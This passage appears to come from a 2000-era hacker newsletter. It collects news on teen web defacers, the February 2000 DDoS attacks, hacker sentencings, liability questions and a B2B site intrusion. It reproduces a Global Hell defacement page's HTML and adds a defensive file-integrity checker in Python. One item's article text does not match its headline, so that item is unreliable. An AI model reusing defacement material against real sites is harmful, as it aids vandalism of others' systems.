      [12:15] <person1> this guy on cnn
      [12:16] <Dr_Coolio> f***
      [12:16] <person3> Dr_Coolio: TURN ON CNN
      [12:16] <Dr_Coolio> kill him
      [12:16] <Dr_Coolio> shut his face up
      [12:16] <person3> a former hacker guy who now works in security
      [12:16] <person2> he said that he goes to school,though
             
             And finally, Coolio corrects the goonies when one slips
      up and forgets to use the third person when referring to the
      hackers as he discusses a television program describing the
      denial of service attacks as a trivial programming feat:
             
      [12:18] <person1> ahahah this guy on cnn..
      [12:19] <person2> man these dudes are sayin you got no skillz
      [12:19] <Dr_Coolio> not me, you mean the hackers
      
      -=-
      
      
      ABC;


       
     Coolio Admits Hacks
      Teen Hacker Tells ABCNEWS He Hacked Three Sites but Denies Major
      Web Attacks 

      Los Angeles police Detective Michael Brausman told ABCNEWS that the
      charges come in connection with the vandalism of the dare.org Web site -
      something Coolio allegedly has admitted to. (Photodisc)
                                                       


      By Brian Ross and Jonathan Dube

      March 2 - A 17-year-old hacker who calls
      himself Coolio told ABCNEWS he vandalized
      three Web sites but was not involved in last
      month's Web attacks.
           The Los Angeles district attorney's office is expected
      to charge the teen-ager, who lives in New Hampshire,
      with vandalism for defacing at least one of the sites,
      Dare.org, Los Angeles police Detective Michael
      Brausman told ABCNEWS. 
           Coolio, speaking through his father today, admitted to
      ABCNEWS that he hacked Dare.org, CWC.gov and
      RSA.com. His father said Coolio wouldn't comment
      when asked whether he hacked into any other sites. 

      Coolio Denies Web Attacks
      But, in an earlier interview with ABCNEWS, Coolio
      denied any involvement with the denial-of-service attacks
      last month that took down leading Web sites such as
      Yahoo!, Amazon.com and eBay.
           "I am categorically denying that I had anything to do
      with the Yahoo attack," Coolio told ABCNEWS. "I
      had nothing to do with any of the Web sites that were
      taken down."
           Coolio says he has been using computers since he was 4
      years old and spends about 12 hours a day on the
      Internet.
           The FBI executed a search warrant at Coolio's home
      last month and confiscated several computers. 

      Many Coolios
      Federal authorities tell ABCNEWS they are investigating
      him in connection with the denial-of-service attacks and
      haven't ruled him out as a suspect. But they said no
      indictment related to the attacks is imminent. 
           The FBI believes someone who calls himself Coolio
      may have been involved in the attacks because they have
      logs of online chat discussions, which ABCNEWS has
      obtained, in which chatters finger Coolio as the culprit and
      he doesn't deny involvement. But he told ABCNEWS he
      was just joking around with friends in the chats. 
           The investigation has been difficult, in part, because
      many people use the online name Coolio. 
           Last month investigators interviewed another person
      who goes by Coolio in California regarding the
      denial-of-service attacks, and he denied any involvement,
      sources told ABCNEWS. 
           The Coolio in California is believed to be a member of
      Global Hell, a group of teenagers who hacked into
      White House and Department of Defense computer
      systems. 

      Dare.org Attacked
      Los Angeles police began investigating the New
      Hampshire Coolio after an attack in December 1999 on
      Dare.org, an anti-drug abuse site the LAPD founded.
      Detective Brausam of the LAPD Computer Crimes Unit
      traced the origin of the attack to a Web site hosted by an
      Internet service provider in Arizona.
           On Dec. 30, the detective obtained a search warrant
      to raid the service provider and traced the attack back to
      the 17-year-old in New Hampshire. 
           The U.S. Secret Service also linked Coolio to an
      attack on CWC.gov, a Commerce Department site that
      outlines rules for exporting chemicals that could be used to
      produce chemical weapons. 
           On Feb. 13, a few days after the flurry of attacks that
      crippled leading Web sites, RSA Security Inc., an Internet
      security company based in Bedford, Mass., was hacked
      into. A hacker calling himself Coolio redirected visitors
      from RSA's Web site - which proclaims itself "the most
      trusted name in e-security" - to another hacked
      computer at a university in South America. There, a nearly
      duplicate hoax site proclaimed: "RSA Security Inc.
      hacked. Trust us with your data. Praise Allah. Owned by
      Coolio."

      Prosecutors to Meet
      Federal prosecutors planned to meet with New
      Hampshire prosecutors Friday to discuss charges. 
           One issue to be ironed out is where he will be
      prosecuted and whether Coolio will be charged as an
      adult or a juvenile, L.A. police officer Guillermo Campos
      said. In California, a 17-year-old would be prosecuted as
      a juvenile, but in New Hampshire someone that age would
      be prosecuted as an adult. 
           If charged in New Hampshire, he would face five to
      15 years in prison. 
           Brausam said Coolio would probably be charged in
      California with unauthorized access to a computer and
      felony vandalism and would be charged as a juvenile. That
      means he faces at least $18,000 in restitution and possible
      time in a juvenile facility. 

      ABCNEWS' Simon Surowicz, ABCNEWS.com's Erica
      Rowell and The Associated Press contributed to this
      report.

      'Coolio' Talks 

      In online chats, Coolio's friends attributed the spate of
      denial-of-service attacks to him, and he led them to
      believe he was responsible. But he told ABCNEWS he
      was just joking. Here are excerpts from ABCNEWS'
      interview with Coolio and his father:
           
      ABCNEWS: Would you consider yourself a hacker? 
      COOLIO: Um. (PAUSE) Yes, I would consider myself a
      hacker. 
      ABCNEWS: Did you reply to your friends when they said,
      "Uh, yeah, Coolio did it." 
      COOLIO: Yeah. I joked that I had done it. 
      ABCNEWS: So you actually, in a way, admitted to it? 
      COOLIO: Yes. To my friends. 
      ABCNEWS: You admitted in the chat logs that you had
      taken Yahoo down? 
      COOLIO: To my friends yes. 
      ABCNEWS: And what did you tell them? 
      COOLIO: I was like, "Yeah, I did it." But I was just joking.

      COOLIO'S FATHER: Kids. [LAUGHTER] Go on those
      IRC [Internet Relay-Chat] channels, you see a lot of that
      stuff happening.
      ABCNEWS: They brag?
      COOLIO'S FATHER: They brag and lie about things
      they've never done. [LAUGHTER] Just like boys. And
      boys brag all the time. But they've never done nothing.
      [LAUGHTER] 
      
      @HWA
      
117.0 HNN:Mar 3rd:  US Army Web Attacker Sentenced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Mindphasr (Chad Davis) was sentenced to six months in
      prison, three years of supervised probation, and ordered
      to pay $8,054 in restitution Wednesday for defacing the
      Web site of the U.S. Army. The defacement occurred on
      June 27th of last year. 

      Nando Times
      http://www.techserver.com/noframes/story/0,2294,500175665-500228667-501105423-0,00.html
      (404/expired)
      
      Attrition.org - Defacement Mirror       
      http://www.attrition.org/mirror/attrition/1999/06/27/www.army.mil/
      
      
      -=-
      
      Other source, no url sorry...
      
      A hacker convicted of breaking into a US Army Web site has reportedly been 
      sentenced to six months in prison and fined $8,054.

      An Associated Press report today said that 20-year-old Chad Davis pleaded 
      guilty Jan. 4 to gaining unauthorized access to the site and altering its 
      contents by replacing the Army's opening Web page with the "signature 
      page" of Global Hell, a nationwide hacker group of which he was a member.

      US District Judge J.P. Stadtmueller, sitting in Milwaukee, ordered Davis 
      to reimburse the military the cost of restoring the site and added three 
      years of supervised release to the prison term, the report said.

      "This is a deadly serious business. It's not something that's a sandbox 
      play tool," the judge is quoted as saying.

      In other hacking news, the latest congressional Web site to be cracked 
      belongs to House Speaker Dennis Hastert, R-Ill. According to The 
      Washington Post, Hastert's Web site was out of commission for several days,
      with visitors to the homepage getting nothing more than a stream of 
      nonsensical text.

      The site is back up, according to leadership spokespeople.
      
      -=-
      
      The fated defacement; (source)
      
      
      <BASE HREF="http://www4.army.mil/">

      <HTML>
      <TITLE>[gH] Alive as ever. [gH]</TITLE>
      <body bgcolor=000000 text=ffffff>
      <BODY>
      <B>
      Hello. <p>
      
      
      This web page hack has a purpose.  Purpose being to settle rumors.<P><P>
      
      
      global hell/gH is alive.<P>
      
      
      global hell/gH will not die.<P>
      
      
      global hell/gH will always be here.<P><P>
      
      
      global hell/gH would like to thank all the individuals and groups who have
      
      
      supported us and done what they could.  Your work did not go unoticed.
      
      
      Much respect to you all.  You know who you are. <P>
      
      
      
      
      
      <P><P>
      
      
      <H1>        krx. Coming soon. </BINK></H1>
      
      
      <!--HAHA, owned!!!!! HACKED BY: t1edown. -->
      
      
      
      
      
      <!-- A big fsck you to all the fakes out there.  All the fakes gH has had
      
      
      to deal with, all the lamers that have turned their back. For all the
      
      
      people reading this, trust very few people. -->
      
      
      </BODY>
      </HTML>
      
      
      <then he bombed - Ed>
      
      @HWA
      

118.0 HNN:Mar 3rd: Who is Liable If Computers Used in Attacks? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The question of liability has been raised in the wake of
      the recent DDoS against major sites on the internet.
      The computers used to launch the attacks are not only
      the culprits but the victims as well. No one seems to
      have sued a third-party site for being used to
      perpetrate a cyber-attack. But because most attacks
      are presumed to be judgment-proof (no money to pay
      restitution), it is only a matter of time before companies
      that suffer damage from attacks find someone who can
      pay that they can sue. The legal question in such a
      lawsuit would be whether the computer owner had a
      duty of care to the victim. 

      New York Law Journal       
      http://www.nylj.com/stories/00/03/030200a5.htm
      
      Getting Hacked Could Lead to Getting
      Sued

      BY RITCHENYA A. SHEPHERD 
      American Lawyer Media News Service 
      Thursday, March 2, 2000 

      WHILE COMPUTER hackers hack and the feds wring their hands, companies
      rushing to connect to the Internet are twisting in the wind of potential liability.

      The hackers that overwhelmed several big Web sites - including those of
      Amazon.com, Buy.com, CNN, eBay, Excite and Yahoo! - with traffic a few
      weeks ago used other people's computers to do it. The hackers mounted their
      attacks by penetrating university computers and commanding them, in turn, to
      deluge the providers with more traffic than individual hackers themselves could
      generate.

      According to specialists in computer law, future attacks could just as well use
      commercial computers. And that fact brings with it an increased responsibility to
      beef up security, the lawyers warn.

      "The hijacked sites are in a unique position; they are both victims and the
      culprits," said Marcelo Halpern, of Chicago's Gordon & Glickson LLC. "The
      question is, are they victims that could have protected themselves?"

      No one appears yet to have sued a third-party site for being used to perpetrate a
      cyber-attack. But because most hackers are presumed to be judgment-proof,
      there is a consensus that it is only a matter of time before companies that suffer
      damage from attacks start to move up the food chain.

      "Somebody's going to get sued; that's clear," said David J. Loundy, of Chicago's
      D'Ancona & Pflaum LLC. "Somebody's going to want a test case. The issue
      [is] whether there's going to be one or two of these suits, or whether it's going to
      be open season against service providers," said Mr. Loundy, who teaches
      computer crime at Chicago's John Marshall Law School.

      "I think there's a straightforward negligence argument," said Stewart A. Baker, a
      partner at Washington, D.C.'s Steptoe & Johnson LLP. "People hacked into
      these computers using known holes in most cases. If you maintain security
      against known hacker attacks, then it's much more difficult to plant the code that
      allows your server to be turned into a zombie."

      The issue in such a suit would be whether the computer owner had a duty of
      care to the ultimate victims. "Whether there's a duty depends on whether the
      courts think there should be," Mr. Baker said. "As the damage to others
      increases, I think courts will have less and less patience [for the argument] that
      there's no duty."

      Amazon.com, Buy.com, CNN, eBay, Excite and Yahoo! all declined to
      comment on whether they are contemplating actions against the third-party sites
      used in attacks against them on Feb. 8 and 9. Lawyers say that the invaded
      universities make unlikely litigation targets.

      The University of California at Los Angeles, U.C. Santa Barbara and Stanford
      University all have confirmed that their computers were used in the attacks. All
      three are cooperating with the FBI investigation. Stanford officials say that the
      attack on eBay used a computer at the university's Hopkins Marine Station in
      Monterey, Calif., which was not as well watched as others. "We will be
      monitoring it much more closely," said Steve Hansen, Stanford's computer
      security chief.

      "University sites are notoriously lax in their security," said Mr. Halpern, so "they
      tend to be fairly easy targets for hackers." But "the sites that were hijacked don't
      make for the nicest defendants ... you're not going to get public sympathy on
      your side suing a university."

      Universities provide public services and must weigh security concerns against
      academic needs for freedom of speech and experimental liberties, lawyers say.
      Therefore, a university could be held to a lower standard than a business. But
      with every new hacker attack, the lawyers say, the standard of care that would
      be applied by a court is likely to rise a notch.

      "Right now, the basic standard is a firewall," said Howard L. Nations, a Houston
      solo practitioner. "But I think the more foreseeable potential hacking becomes,
      the greater the burden to go beyond a firewall and write your own software ... to
      cope with your site's potential security problems."

      A firewall is a gate between the Internet and individual computers that lets
      through some, but not all, traffic, depending on its program.

      "The problem is, it's a moving target," Mr. Nations said of security.
      "State-of-the-art [technology] changes exponentially ... and the hackers are
      moving exponentially plus, so it's a constant battle."

      Two ways to stay current are to check with Carnegie Mellon University's
      Computer Emergency Response Team, which tracks hacking, and the Sans
      Institute, in Bethesda, Md., which has posted a "road map" to prevent attacks
      such as those launched in early February.

      But things threaten to become "worse, real fast," warns Sans Research Director
      Alan Paller. The attacks identified so far have come from computers operating
      Sun's Solaris or Linux operating systems. But on Feb. 18, administrators
      identified 160 Windows-based PCs at James Madison University in Virginia with
      the same DOS attack code, indicating that they had been prepared for hacker
      use.

      "That means an automated script exists that can take over PCs," said Mr.
      Paller, so computer administrators should upgrade their virus software fast.

      "A lot of people run computers that are unprotected," he said. Even workplaces
      with firewalls are vulnerable because employees may disengage them to
      download Internet goodies.

      The recent attacks could encourage federal legislation. Representative Thomas
      M. Davis, R-Va., is drafting a bill that would create an information analysis center
      to encourage organizations to share information about cyber-attacks. The bill
      would protect disclosing parties from liability and Freedom of Information Act
      requests, said Representative Davis' spokesman, David Marin.

      Mr. Paller, who participated in President Clinton's Feb. 15 summit on on-line
      security, said he expects bills that will take down barriers to sharing information
      about cybercriminals across state lines and that will set security standards for
      government contractors.

      Despite the Internet community's dislike of regulation, lawyers say, someone
      must set the standard of care. "The technology community will say up and down
      that they don't think the government should be involved in this, but once they see
      what private lawyers and judges come up with, they'll be much more open to
      government action," Mr. Baker said.

      Administrators are increasing security by rejecting connection requests from
      sites suspected of adopting inadequate standards. And inquiries for hacker
      insurance appear to be on the rise.

      These measures may not calm the storm. "People don't like to hear this, but
      let's face it: Part of the Internet is just not ready for prime time," Mr. Loundy said.
      "This is a system that a 12-year-old can manipulate and take offline."
      
      @HWA
      
119.0 HNN:Mar 3rd: Email Threat Lands Teenager In Jail 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by David Schwindt 
      A 15-year-old High School student is currently in police
      custody after allegedly threatening school officials
      Monday with a plan to "blow (the school) to pieces."
      The threat was delivered via email from a computer
      within the school. Chad Varner was arrested Wednesday
      on a charge of making threats to place an explosive or
      incendiary device. 

      Clinton Herald       
      http://www.clintonherald.com/display/inn_news/news1.txt
      
      Clinton police chief announces his resignation 

      By Lori Allesee/Herald Staff Writer 

      CLINTON - Clinton Police Chief Gene Beinke announced Thursday he will turn 
      in his badge next month to pursue other career interests. 

      Beinke's notice was submitted to members of the Clinton City Council 
      today. Beinke, who is Clinton's longest serving police chief, will retire 
      from his position May 15. 

      "I have chosen to pursue other career interests," said Beinke, 54, in his 
      letter of resignation. "I am grateful for having had the opportunity to 
      serve you and the community and will take with me many good memories." 

      Beinke could not be contacted for comment today. 

      The Clinton Civil Service Commission will immediately begin searching for 
      Beinke's replacement by compiling a pool of eligible candidates, said City 
      Administrator George Langmack. From the Civil Service Commission's list of 
      finalists, Langmack will make an appointment with the approval of
      the Clinton City Council. 

      Beinke's successor is expected to be named within 60 days of his 
      resignation. 

      Beinke was appointed as Clinton's police chief in April 1986. A month 
      later, on May 19, 1986, Beinke took over as the Clinton Police 
      Department's leader. He replaced Russel Bentley. 

      During his tenure, Beinke established Clinton's School Resource Officer 
      Program and the Citizen Police Academy. 

      In 1994, Beinke persisted through an on-going controversy about his 
      management of the police department. That controversy was spearheaded by 
      some City Council members who wanted Beinke terminated. 

      Those allegations set the stage for the same group of people to 
      investigate Langmack. The council believed Langmack failed in his 
      responsibilities when he did not relieve Beinke of his duties. 

      Beinke was later exonerated by the Iowa Attorney General's Office of any 
      allegations of wrong-doing. The Iowa Attorney General's Office stated that
      the allegations were management questions and that only complaints
      alleging criminal violations would justify inquiry.

      Less than a year later, Beinke suffered a brain hemorrhage that took him
      off the job for nearly three months. Upon his return, one councilman
      prompted a campaign to dismiss Beinke from his job. The councilmen
      questioned Beinke's ability to perform as chief of police. However,
      that effort failed. 

      Beinke began his law enforcement career in 1970 when he joined the 
      Waterloo Police Department. Four years later, he took on several roles 
      with the Cedar Falls Police Department. 

      Beinke later joined the Evansville Police Department, serving as a police 
      officer and later as chief of police. In 1983, Beinke accepted the chief 
      of police position in Washington. While serving with the Washington Police 
      Department, Beinke co-founded the Midwest Association of Police and
      Prosecutors. 

      Beinke is the second top civil servant in four months to announce his 
      retirement. 

      In November, Clinton Fire Chief Russ Luckritz declared his intention to 
      retire. Luckritz, who served as Clinton's fire chief since 1986, stepped 
      down from his position in January. Luckritz's successor is expected to be 
      announced Tuesday. 
       
      @HWA
      
120.0 HNN:Mar 3rd: Japanese Afraid of Cult Software 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This is an intriguing story, anyone have any further material on
      this? - Ed

      contributed by turtlex hacker 
      Software purchased by the defense agency of Japan
      would link the networks at 20 army garrisons across
      Japan, giving them internet and e-mail access. It has
      been discovered that some of the software may have
      been written by members of the Aum Shinrikyo cult. It is
      feared that Aum Shinrikyo, which carried out the fatal
      gas attack on the Tokyo subway in 1995, may have left
      backdoors into the software they wrote allowing them
      access to defense computer systems. After police
      raided the apartments of eight cult members it was
      discovered that several software firms run by Aum
      members have also provided products for the
      Construction Ministry, the Education Ministry, and the
      Post and Telecommunications Ministry. 

      BBC       
      http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_662000/662172.stm
      
      
      Japan's computers hit by
      cult fears

      (Photo caption: Thousands of people were injured in the 1995 attack)

      Japan's Defence Agency has delayed the introduction of a new computer
      system after discovering that it used software developed by members of
      the Aum Shinrikyo cult.

      The discovery has prompted fears that the cult - which carried out the 
      fatal gas attack on the Tokyo subway in 1995 - could use the software to 
      infiltrate government computers and gain access to vital defence 
      information. 

      Tokyo police said the Defence Agency was one of 90 government bodies and 
      private firms which had ordered software produced by the cult. 

      A Defence Agency spokesman told the AFP news agency: "We had been 
      expecting to introduce the system today but halted the plan for the time 
      being as it is too dangerous. 

      "Nobody knows what they have done to the system and we need to check it 
      thoroughly." 

      Chief Cabinet Secretary Mikio Aoki told a news conference: "It should not 
      be impossible to replace the software with that developed by other 
      companies." 

      Subcontractor 

      The Defence Agency signed a contract for the computer system with the 
      Japan Electronic Computer Co Ltd last October. 

      The company, which is not linked to Aum, was to supply the system linking 
      networks at 20 army garrisons across Japan, giving them internet and 
      e-mail access, the defence agency spokesman said. 

      However, the computer firm "told us they had discovered one of the 
      subcontractors they used was linked to Aum". 

      The spokesman said the Defence Agency was "investigating whether Aum 
      members, under the pretext of developing software for the agency, had a 
      chance to figure out ways to break the firewall" that prevents illicit 
      access to its networks. 

      Tokyo police said software firms run by Aum members had also provided 
      products for the Construction Ministry, the Education Ministry, and the 
      Post and Telecommunications Ministry.


      Raids 

      The deals were discovered on Tuesday after police launched raids on eight 
      apartments belonging to cult members. 

      Local reports said about 40 Aum followers were operating five software 
      companies and conducted sales activities covering 500 major companies by 
      offering large discounts. 

      Twelve people were killed and thousands more were injured when Aum 
      launched the sarin gas attack on Tokyo's subway system in March 1995. 

      Aum preached that the world was coming to an end and the cult must arm 
      itself. 

      However in January this year, the cult issued a statement deposing jailed 
      Shoko Asahara as leader, changing its name to Aleph, and vowing to 
      introduce reforms - which included a promise to obey the law. 
      
      
      @HWA
      
121.0 HNN:Mar 3rd:B2B Site Compromised Hours After Going Online 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Three hours after launching the business-to-business
      e-commerce web site it had been broken into. The web
      site, EDAToolsCafe.com, reported the break-in to the
      FBI's San Jose, California regional office who are looking
      into the attack. 

      Business Wire - via Excite News 
      http://news.excite.com/news/bw/000301/ca-edatoolscafe.com
      
      
      "Electro" Hacks EDAToolsCafe.com B2B Portal



      Updated 11:00 AM ET March 1, 2000
  
      SAN JOSE, Calif. (BUSINESS WIRE) - EDAToolsCafe.com a Silicon Valley based
      premier EDA (Electronic Design Automation) web portal opened its business-
      to-business  e-commerce operation at 10AM Monday morning, February 28, and
      was brought down less than three hours later, at 12.24PM by a hacker or 
      hackers who call themselves "Electro." The break-in was reported to the 
      FBI's San Jose, California regional office who are looking into the attack.
  
      The EDAToolsCafe site, which has been in operation for more than three years
      providing resources for the EDA engineering community, announced the opening
      of its b2b e-store in a Business Wire press release earlier in the day. The 
      announcement released jointly by Cohesion Systems a participating EDA 
      software vendor and EDAToolsCafe, was sent over the wire and disseminated
      just hours before the break-in.
  
      Internet Business Systems, Inc. (IBS) owns and operates the EDAToolsCafe
      portal which features sponsorship from Sun Microsystems, Mentor Graphics,
      Avant!, and other major EDA companies.
  
      "The hackers were real pros, but they triggered one of our 'trip-wires'
      and alerted us to their intrusion early in the game," said Brian Haney, 
      IBS VP of Engineering. "The intruders were able to gain access to our 
      server and were in the process of setting up a process that they could 
      then in-turn use to hack the IRC (Internet Relay Chat) network when we 
      shut them down. In the process, they left their signature, a tell-tale 
      calling card 'Electro'." Mr. Haney also said "they had installed modified
      versions of a number of Unix processing and process monitoring programs in
      an attempt to hide behind these and obscure their presence. They were in 
      the process of activating two programs, one called 'muh,' and the other 
      called 'milk' written by a Czechoslovakian programmer. These utilities, 
      once activated, would have allowed the perpetrators to hide behind the 
      EDAToolsCafe while they raided the IRC or caused havoc at other
      major web sites."
  
      Expert assistance, in the form of two teenage web system pros, was called in
      to pinpoint the break-in point and install safeguards to prevent future
      intrusions. The site was put back in service at 10AM Tuesday morning,
      February 29 after shutting down the EDAToolsCafe server, flushing it out,
      and installing finer grain trip-wires.
  
      "The cost to IBS in terms of lost advertising revenues and e-commerce 
      was minimal and the lessons learned will help prevent future situations
      of this type," said David Heller, IBS President. He also said that,
      "The shut down and subsequent refocusing of engineering resources will
      slightly delay the introduction of e-Catalog, a complete b2b solution 
      that was scheduled to premiere on Wednesday, March 1. But, it's better
      to be safe than sorry." 
  
      Contact: Internet Business Systems, Inc., San Jose Sanjay Gangal, 
      408/260-8010 marketing@ibsystems.com 
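
      The trip-wire approach Mr. Haney describes, catching replaced system
      utilities by comparing files against a known-good baseline, as an added
      example (not code from the press release or from IBS). The directory
      layout and file contents are constructed for the demo; "muh" appears
      only as the name of an unexpected file because the article names it.

```python
import hashlib
import os
import stat
import tempfile


def snapshot(root):
    """Record sha256, size, mode and mtime for every regular file under root."""
    records = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices and sockets
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            records[rel] = {
                "sha256": digest.hexdigest(),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
                "mtime": int(st.st_mtime),
            }
    return records


def compare(baseline, current):
    """Return sorted (kind, path, detail) findings between two snapshots."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old is None:
            findings.append(("ADDED", path, "not in baseline"))
        elif new is None:
            findings.append(("MISSING", path, "in baseline, gone from disk"))
        elif old["sha256"] != new["sha256"]:
            # Size and mtime can be left looking untouched, so only the
            # content hash is treated as authoritative.
            quiet = old["size"] == new["size"] and old["mtime"] == new["mtime"]
            detail = "content changed"
            if quiet:
                detail += ", size and mtime unchanged"
            findings.append(("MODIFIED", path, detail))
        elif old["mode"] != new["mode"]:
            findings.append(("PERMS", path, "%o -> %o" % (old["mode"], new["mode"])))
    return findings


def demo():
    """Build a constructed bin/ directory, change it, and report the drift."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "bin")
        os.mkdir(bindir)
        for name in ("ps", "top", "netstat"):
            path = os.path.join(bindir, name)
            with open(path, "wb") as fh:
                fh.write(b"original " + name.encode() + b"\n")
            os.chmod(path, 0o755)
        baseline = snapshot(root)  # taken while the host is known good

        # Constructed change 1: same-length replacement of ps with its
        # original timestamps put back, which a size/mtime check would miss.
        ps = os.path.join(bindir, "ps")
        st = os.stat(ps)
        with open(ps, "wb") as fh:
            fh.write(b"replaced ps\n")
        os.utime(ps, ns=(st.st_atime_ns, st.st_mtime_ns))

        # Constructed change 2: top becomes world-writable.
        os.chmod(os.path.join(bindir, "top"), 0o777)
        # Constructed change 3: netstat disappears.
        os.remove(os.path.join(bindir, "netstat"))
        # Constructed change 4: a file that was never in the baseline.
        with open(os.path.join(bindir, "muh"), "wb") as fh:
            fh.write(b"unexpected file\n")

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, path, detail in demo():
        print("%-8s %-12s %s" % (kind, path, detail))
```

      The baseline only helps if it is kept off the monitored host or on
      read-only media; an intruder who can replace ps can also rewrite a
      baseline stored beside it.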
  
      @HWA
      
122.0 HNN:Mar 3rd:State of Maine May Give Computers to All Students. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by SonjaC 
      State of Maine Governor Angus King has said that
      starting in 2002, he wants each of Maine's 17,000
      seventh-graders to get issued a laptop computer and
      receive internet access. King hopes to supply $75 million
      in Federal and state funds to pay for the plan. Some
      lawmakers said that the money would be better spent
      fixing leaky school roofs. (The hardware is worthless
      without the education to support it. Hope they take
      into account the cost of software, technical support
      and upgrades.) 

      Nando Times 
      http://www.nandotimes.com/technology/story/body/0,1634,500175805-500228878-501106733-0,00.html
      
      Maine governor wants a computer on every 7th-grader's lap 

       Copyright (c) 2000 Nando Media
       Copyright (c) 2000 Associated Press

      
      By GLENN ADAMS 

      GARDINER, Maine (March 2, 2000 3:50 p.m. EST http://www.nandotimes.com) - 
      Echoing the old political promise of a chicken in every pot, Gov. Angus 
      King on Thursday said he wants to put a computer on every kid's lap. 

      Starting in 2002, he wants each of Maine's 17,000 seventh-graders to get a 
      laptop computer that will be theirs to keep, regardless of whether they 
      have one at home. 

      What King calls the nation's most far-reaching school computer initiative 
      generated a cool if not skeptical response in the state Legislature. 
      Reaction in schools across the state was mixed. 

      "The `haves' don't need two or three computers at home," said Howard 
      McFadden, principal of an 80-student school in Edmunds Township. He would 
      like to see the "have-nots" get computers, though. 

      Under King's proposal, students would get computers when they enter the 
      seventh grade. 

      The governor, an independent, hopes to draw $25 million in federal and 
      private money to supplement $50 million in state money and create an 
      endowment that would pay for computers for every succeeding seventh-grade 
      class. 

      "I have not yet run across an idea with more potential to really make a 
      difference in our schools, in our education system and in our young 
      people's prospects, and that's what it's really all about," King said. 

      Some lawmakers balked at the one-time cost of $50 million from the state 
      budget, suggesting that fixing leaky school roofs, for example, should get 
      a higher priority. Requests for school repairs already far exceed the 
      money available, they said. 

      "The choice of laptops over school renovations is something I can't 
      fathom," said state Rep. Elizabeth Townsend, co-chairwoman of the 
      Appropriations Committee. 

      The proposal earned King praise from educators like Chris Toy, principal 
      of the Freeport Middle School, where 100 seventh-graders would be 
      eligible. 

      "You definitely have to take care of bricks and mortar, but we also need 
      to look at constructing students' minds," he said. 

      The prototype laptops sell for about $600 or $700, but the governor hopes 
      they can be purchased in bulk for as little as $500. 

      King said that Maine is already "doing a ton of construction" and that the 
      state should not wait "until every last gutter is fixed" to adopt the 
      idea. 

      
      @HWA  
      
123.0 HNN:Mar 6th: Coolio Not a Suspect in DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad 
      Despite what has been published by some overzealous
      media outlets 'Coolio' is not a suspect in the recent
      DDoS attacks. While admitting to defacing several
      hundred web sites including dare.org and rsa.com he
      has denied any involvement in the DDoS attacks. The
      FBI has said that they doubt he is responsible for the
      attacks. While Coolio's computer and other belongings
      have been confiscated no charges have yet been filed. 

      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2455311,00.html      
      
      'Coolio' not a suspect in DoS attacks

      Despite admitting hacking 100 sites, the
      17-year-old is not responsible for big
      denial-of-service attacks on Web sites,
      investigators say.



      By David S. Cloud and Joe Mathews, WSJ Interactive
      Edition
      March 3, 2000 8:08 AM PT 


      WASHINGTON -- Federal Bureau of Investigation
      agents investigating last month's Web-site attacks
      said they don't think a 17-year-old New Hampshire
      youth whose name surfaced as a suspect is
      responsible for the incidents.

      The young man, who goes by the online handle "Coolio,"
      became a suspect last month after someone using that
      moniker claimed credit for several Web attacks. Los
      Angeles police questioned him recently in connection
      with attacks on an antidrug site that officers there run, a
      Los Angeles Police Department spokesman said. The
      youth acknowledged hacking into that site and at least
      100 others, the spokesman said. Local prosecutors are
      still considering charging him with computer crimes
      unrelated to last month's attacks on major commercial
      Web sites such as those operated by eBay Inc. (Nasdaq:
      EBAY) and Yahoo Inc., (Nasdaq: YHOO) according to
      the spokesman. The youth's name couldn't be learned.

      Investigators carried out a search warrant on the youth's
      home last month and confiscated several computers that
      were examined by the FBI. Federal investigators believe
      that other hackers may have used the name Coolio. As
      for who is responsible for the denial-of-service attacks,
      officials said that they have "promising leads" and that
      prospects are improving for arrests in the case. The
      leading theory remains that the initial outages beginning
      Feb. 7 were coordinated by an individual or a group and
      were followed by copycat incidents.

      One federal law-enforcement official said the FBI fieldwork
      was "focused in the Atlanta and Boston field offices." Gail
      Marcinkiewicz, spokeswoman for the Boston FBI field
      office, wouldn't confirm that, saying only that the division
      had made no arrests in the case.
      
      @HWA
      
124.0 HNN:Mar 6th:Gatsby of the PhoneMasters gets 18 Months 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The Gatsby (Jonathan Bosanac) has been sentenced to
      18 months in federal prison. He was also ordered to pay
      $10,000 in restitution to three telephone companies. As
      a member of the 'PhoneMasters' Gatsby and others
      perpetrated one of the largest telephone fraud activities
      ever committed. The crimes took place more than five
      years ago. Friends say the man's life has since turned
      around. He's been working as a computer consultant. 

      Associated Press - via Fox News    
      http://www.foxnews.com/vtech/030500/hack.sml
      
      A computer hacker known online as "The
